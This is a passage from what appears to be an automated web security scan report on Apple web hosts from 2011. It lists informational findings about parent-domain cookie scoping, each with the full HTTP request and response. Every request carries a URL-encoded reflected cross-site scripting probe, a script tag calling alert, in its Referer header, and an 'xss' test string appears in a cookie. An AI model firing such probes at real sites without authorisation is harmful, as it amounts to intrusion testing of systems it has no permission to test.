ccl=YTXNJI3FCQgB8dxsD7AqY057PByO/l2zbgH2wFRDrum3Ig6uCv0TBq2YpQf7se3WXtxZIAuMgq2gqgzWOIWTaNykftxf5IuPXpHcSkePmbVV+WxpHpMfEQ63QCxuF/gYS66T0bwSMAKw72SU24T0S3/O3qpnD/mmKl7Djfib8oqwY+QyAUn2FVU1LLelD8bHgt+60axQ6wI9FSa+KYIwnLpx4+xeWRCtXubNAG9x/mLbJ/s0EEyJeqrb2Q0pB6/wfaIXuCRTZZNxgx/LBjRvOtP8/oWh6RWWi1Td+4SJRN+LroThUN8oONNoPYNkLPBhxbcm7HKbIkaiccBRGdO8lUPZjKAbR0UdHCjCFYFNTD2+qZGMw3rQ9FN08c7dTDK/V1ppOWGYffKVJmx2tQJA6hS+SsKZ9tgXMThwD4teMLUnpzpJ6Ba6h+xt0pOR8ptOaucyf2mlsCzSuyu3DvQMHTKxLaaetcHng+vBxmvEmfV5kJzIxGA/XSsoHS8LcT3UEEK2nlhphXHvP3Zp69rkoEX3DHA9ArlKEwfvB/dCK4doNvsHYUK3nb20cjYge1zw; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/overlay_panel.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 30 Mar 2011 22:24:08 GMT
If-None-Match: "2be4-49fbaa2a07200"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 22:24:08 GMT
ETag: "2be4-49fbaa2a07200"
Cache-Control: max-age=459
Expires: Tue, 19 Jul 2011 18:58:19 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=YTXNJI3FCQgB8dxsD7AqY057PByO/l2zbgH2wFRDrum3Ig6uCv0TBq2YpQf7se3WXtxZIAuMgq2gqgzWOIWTaNykftxf5IuPXpHcSkePmbVV+WxpHpMfEQ63QCxuF/gYS66T0bwSMAKw72SU24T0S3/O3qpnD/mmKl7Djfib8oqwY+QyAUn2FVU1LLelD8bHgt+60axQ6wI9FSa+KYIwnLpx4+xeWRCtXubNAG9x/mLbJ/s0EEyJeqrb2Q0pB6/wfaIXuCRTZZNxgx/LBjRvOtP8/oWh6RWWi1Td+4SJRN+LroThUN8oONNoPYNkLPBhxbcm7HKbIkaiccBRGdO8lUPZjKAbR0UdHCjCFYFNTD2+qZGMw3rQ9FN08c7dTDK/V1ppOWGYffKVJmx2tQJA6hS+SsKZ9tgXMThwD4teMLUnpzpJ6Ba6h+xt0pOR8ptOaucyf2mlsCzSuyu3DvQMHTKxLaaetcHng+vBxmvEmfV5kJzIxGA/XSsoHS8LcT3UEEK2nlhphXHvP3Zp69rkoEX3DHA9ArlKEwfvB/dCK4doNvsHYUK3nb20cjYge1zw; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.70. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=LEJBEBcQgxjRsTTCyAyYKhmrQ29mZ0tWZB2LLEvwBvmGhUolex0IKN0tkOfWn0IRDQecZ7oWhs+BcY4jVyGVZNnMltnMRgtSDqGLLt0A4dQCM2dk3XSM93IAotSYgDtChyr6vB5EnIx9I8BGt1w+NV02BAMXRHFAU5KKQ4pDq9PYwMmpFhrmYVnkmPEB2wSd7jOCQIIo8SG+3fCB93TKfTnFPl9XC3aBtShw+7JTPold2YkZobB1eP4vaaNyiXG4r+vGIDmVsy3H0bmCQBzD3QOMbB69nwIgfE4xTPT3Muku37mGY1aulIO/b39sugY/NrWIYfVq+MAcTRJri8mruMiZnOozdqngIcCl/rtx2fq/XcoYRslIgp8Oalavojqcq18SDeyDaBRoC8ECx0aoKp9VOnMeqA2aWHzunbVZ/SUNoqg02qeRYmaNIbv/S56XrUylAt3mdz56r9MHZeDu/qMb98o3CXzRVtubBHxcbZ33NfYY2HWiZqpqNM2T45275YqvYQu325MjTG59ZL2p346RvTxqFT3xE0jLl2080M5vX04ea4TN8q2cR1qNhiJR; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT
If-None-Match: "230-4a05bce73b440"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=369
Expires: Tue, 19 Jul 2011 18:56:49 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=LEJBEBcQgxjRsTTCyAyYKhmrQ29mZ0tWZB2LLEvwBvmGhUolex0IKN0tkOfWn0IRDQecZ7oWhs+BcY4jVyGVZNnMltnMRgtSDqGLLt0A4dQCM2dk3XSM93IAotSYgDtChyr6vB5EnIx9I8BGt1w+NV02BAMXRHFAU5KKQ4pDq9PYwMmpFhrmYVnkmPEB2wSd7jOCQIIo8SG+3fCB93TKfTnFPl9XC3aBtShw+7JTPold2YkZobB1eP4vaaNyiXG4r+vGIDmVsy3H0bmCQBzD3QOMbB69nwIgfE4xTPT3Muku37mGY1aulIO/b39sugY/NrWIYfVq+MAcTRJri8mruMiZnOozdqngIcCl/rtx2fq/XcoYRslIgp8Oalavojqcq18SDeyDaBRoC8ECx0aoKp9VOnMeqA2aWHzunbVZ/SUNoqg02qeRYmaNIbv/S56XrUylAt3mdz56r9MHZeDu/qMb98o3CXzRVtubBHxcbZ33NfYY2HWiZqpqNM2T45275YqvYQu325MjTG59ZL2p346RvTxqFT3xE0jLl2080M5vX04ea4TN8q2cR1qNhiJR; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.71. http://images.apple.com/global/scripts/swap_view.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=DgFhV0K9vbrLvIKQ/ohaOrDgNrbgYzv038niR20mFJ1TeNIhlRS9Akj+VtmF8/YQWH6+TNwMCIJ/xwlSCj/VZ1QqQKKs+9YCHrWJbbBxrMcbKZzNJ/6jo0ef9WBeJMnKqyGXCTM6W6zU3KzNsKGRem5F2gKN8NiYS0vlDCU9abaven2AVH4YHwSKZoN5M5nOz/bvqYPvJoLLAI5KMFCwoFqjO92pnNnaIVTmO+nRpkl9Xy7SRXKDz9LDw58cFhuIMCrfK3GMHYIxv/NVeZZVIp+cdFy0jBUg25LC58XbP7o3ZpULlNf/iTECsydJmsrkK8DRdnjNm797Ts5WfBSHzvqYysZ1ZSU0a77CxWOTy64eM9Nwh714ihKnzZQi/Bp0B+7uUCcfswE3pgUVYGBSSrSE+QqssPiwzB2j51Q7637zezmWRBhG4gQ1z+7+AzsneClCGUjhtzwzW9clgcVnAUXCKluCDdrjw0eHDKx/fJNE65vLnnXUju0pk98x8W6EeXy/Lb42sLCsZAyYODkBTD1j33V98NyncjXmtB6rQnQWxLPfoSpKcTY+knm4sbyP; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/swap_view.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 05 Jun 2011 18:21:01 GMT
If-None-Match: "101b4-4a4fb0c8a9d40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 05 Jun 2011 18:21:01 GMT
ETag: "101b4-4a4fb0c8a9d40"
Cache-Control: max-age=383
Expires: Tue, 19 Jul 2011 18:57:03 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DgFhV0K9vbrLvIKQ/ohaOrDgNrbgYzv038niR20mFJ1TeNIhlRS9Akj+VtmF8/YQWH6+TNwMCIJ/xwlSCj/VZ1QqQKKs+9YCHrWJbbBxrMcbKZzNJ/6jo0ef9WBeJMnKqyGXCTM6W6zU3KzNsKGRem5F2gKN8NiYS0vlDCU9abaven2AVH4YHwSKZoN5M5nOz/bvqYPvJoLLAI5KMFCwoFqjO92pnNnaIVTmO+nRpkl9Xy7SRXKDz9LDw58cFhuIMCrfK3GMHYIxv/NVeZZVIp+cdFy0jBUg25LC58XbP7o3ZpULlNf/iTECsydJmsrkK8DRdnjNm797Ts5WfBSHzvqYysZ1ZSU0a77CxWOTy64eM9Nwh714ihKnzZQi/Bp0B+7uUCcfswE3pgUVYGBSSrSE+QqssPiwzB2j51Q7637zezmWRBhG4gQ1z+7+AzsneClCGUjhtzwzW9clgcVnAUXCKluCDdrjw0eHDKx/fJNE65vLnnXUju0pk98x8W6EeXy/Lb42sLCsZAyYODkBTD1j33V98NyncjXmtB6rQnQWxLPfoSpKcTY+knm4sbyP; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.72. http://images.apple.com/global/scripts/view_master_tracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=xLxcwxCeTU+HYfHdmg/XQ8YHOoiJO9noVqYg78e8+UwdNUwRLNGUneo/H/zqR6hX6hwuFlGm33hlyD+iHOcu2Nz05YIPyfnvB7M7c+5fPVLYhQdWWcR9Vx9fVRfrc5gt7rzuGzLi8pq+ksSNXMMYXeztRsf5amVS0qX/jE9IqXzFeyUzRF5QNcIFGUpQYa4c8+MMVeVWYo4wLZP+6fr4/mKawRV5fhRfA16jKNYam9mElYTBhrtroIu+IP9hM2zUmpjHPFZwQv7j/hs+F+B8paUkojp3Qle7GfRR8YNkZJ3MoYnxIb5yJLXQn9EZxYG6PB3v5k55MOj3vyPQeMWEr2EYhIgHSgTFSxSKp30GRFQYQ1Xal8nUiCv/kLGbCEz6Rmh4rTkVYAUvVmFc0l4fiUEWPgByZjpkVvevgCKRSi3mA+v14EJ6g8fw5nxnUsEaivwDP0a5V/StziMyyqofL7v4N+VFH/VfQasfZ04ORMFy40xFvWNSDWmObK+KZOFDgy4tcRNpIlxvdwe0F4BBHaa/wNVIDWdQKtGjCEeFPQuE7i5E2HlkgivW1oGtcdWT; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/view_master_tracker.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 28 Apr 2011 22:13:30 GMT
If-None-Match: "243c-4a201ddff3680"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 22:13:30 GMT
ETag: "243c-4a201ddff3680"
Cache-Control: max-age=398
Expires: Tue, 19 Jul 2011 18:57:18 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=xLxcwxCeTU+HYfHdmg/XQ8YHOoiJO9noVqYg78e8+UwdNUwRLNGUneo/H/zqR6hX6hwuFlGm33hlyD+iHOcu2Nz05YIPyfnvB7M7c+5fPVLYhQdWWcR9Vx9fVRfrc5gt7rzuGzLi8pq+ksSNXMMYXeztRsf5amVS0qX/jE9IqXzFeyUzRF5QNcIFGUpQYa4c8+MMVeVWYo4wLZP+6fr4/mKawRV5fhRfA16jKNYam9mElYTBhrtroIu+IP9hM2zUmpjHPFZwQv7j/hs+F+B8paUkojp3Qle7GfRR8YNkZJ3MoYnxIb5yJLXQn9EZxYG6PB3v5k55MOj3vyPQeMWEr2EYhIgHSgTFSxSKp30GRFQYQ1Xal8nUiCv/kLGbCEz6Rmh4rTkVYAUvVmFc0l4fiUEWPgByZjpkVvevgCKRSi3mA+v14EJ6g8fw5nxnUsEaivwDP0a5V/StziMyyqofL7v4N+VFH/VfQasfZ04ORMFy40xFvWNSDWmObK+KZOFDgy4tcRNpIlxvdwe0F4BBHaa/wNVIDWdQKtGjCEeFPQuE7i5E2HlkgivW1oGtcdWT; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.73. http://images.apple.com/macpro/scripts/pagenav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=ZHzTaP/phyT7ZztWPfF5YV5rnLeKreE+BudU5VhJnvfzQE8c76KGu5bYP2Jzb5XcPvR/RMzLRmQ5vbPj28VAYRnqDE3wGY9bhnVVrx+x7BRNhOYCye0Q/zuhgPrHaJxpN93Aehy4J54iy2k6AGj85umsg42TuAZ8IM0dASMUW6L3nymXapXlPmi9fO7CsBm3tuoQFaO5QxnFQ8v7rYtrI2X0RWi2L7JSVaEEcf17F98FUrdpo35pmpAJNA9vNteKaT+fqJpnmhwsPxwRjmJW+9fx5oU6d2BipKOTqedPxNZ1yM5XchWp/bDANVriSqcdjdMmn4cZ5KfY0n/7UUQ3yHsNBxEAudwcCY0zkX1yl+F56vNE78bLS/l6ffsqlEADXYVG4dYfvWaYqT90FPcrQbIaZVZTG+nrj6rnAcxbkyzIy0RGpslI7/qF77mmUd8g6aQ/dqf60BZbFAJrQwTahUZDJcf7IFyI5SiDn8Y/MGBKwK2Tksrb1kC073U8KfGOsjUQtAP7mPjp/L+NoCYoC4MLbDi+AE7LaFApk3Z8zu6U7az+j+Bdv62J564xGR99; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/pagenav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 13 Jan 2008 02:48:33 GMT
If-None-Match: "7ca-4439198664240"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 13 Jan 2008 02:48:33 GMT
ETag: "7ca-4439198664240"
Cache-Control: max-age=362
Expires: Tue, 19 Jul 2011 18:56:42 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=ZHzTaP/phyT7ZztWPfF5YV5rnLeKreE+BudU5VhJnvfzQE8c76KGu5bYP2Jzb5XcPvR/RMzLRmQ5vbPj28VAYRnqDE3wGY9bhnVVrx+x7BRNhOYCye0Q/zuhgPrHaJxpN93Aehy4J54iy2k6AGj85umsg42TuAZ8IM0dASMUW6L3nymXapXlPmi9fO7CsBm3tuoQFaO5QxnFQ8v7rYtrI2X0RWi2L7JSVaEEcf17F98FUrdpo35pmpAJNA9vNteKaT+fqJpnmhwsPxwRjmJW+9fx5oU6d2BipKOTqedPxNZ1yM5XchWp/bDANVriSqcdjdMmn4cZ5KfY0n/7UUQ3yHsNBxEAudwcCY0zkX1yl+F56vNE78bLS/l6ffsqlEADXYVG4dYfvWaYqT90FPcrQbIaZVZTG+nrj6rnAcxbkyzIy0RGpslI7/qF77mmUd8g6aQ/dqf60BZbFAJrQwTahUZDJcf7IFyI5SiDn8Y/MGBKwK2Tksrb1kC073U8KfGOsjUQtAP7mPjp/L+NoCYoC4MLbDi+AE7LaFApk3Z8zu6U7az+j+Bdv62J564xGR99; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.74. http://images.apple.com/macpro/scripts/performance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=huWud6MKM7fGr0sLtRFuzkknrgsqAUkTp5IgBXkjCJaXl1aBa2/a1BTGEGc6O2eGT1eLV6q4Dy5MBqDybpe/t+hzl8OwCOE533KhHnYrArt9HgSVUjzpYV8BY2XC/2FgpB5CiaviiqCklljw6gCQppgmf301SbQsao3jTu8JT28V5D++bg4X/u7IqczRA+pCv/AEKmcJV9srYhH/qlNZ7tBqNPtTMu1U4xT08moPm4Y4Ch/OYdqCwrk81oJzey2qnZdg6xTi8vobg+YNRJX9aNVT3l/iQfBmQR8nrLQCxIfls1E30U4qkqvqndWd6WsgqCEpREkk+78aS/kgGNXYWlKuHD/1zX7CxFAIQSOcb9AQDJV4rZoYSi8v3O2dsqVYzRKsE8Ai4wLbk8hpZV+dbBtMzaSUTxBSc2yw69wZ2Ipmon6WGQhryD0tKpL7OtTNgqYdcbQ3laI4KTk4JXZ9o38DMubgklNazzhfx8w2ERFgv9vPYx2+BrY5ltemg5F8DAZcU43GXtzMHdW+dsyRXnabk9Lu6RdwhM+HaUARBVzZ9te0DlM9fMQ6i8/OIGSj; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/performance.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 18 Nov 2010 00:36:10 GMT
If-None-Match: "1155-49548f9ebb280"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Nov 2010 00:36:10 GMT
ETag: "1155-49548f9ebb280"
Cache-Control: max-age=111
Expires: Tue, 19 Jul 2011 18:52:31 GMT
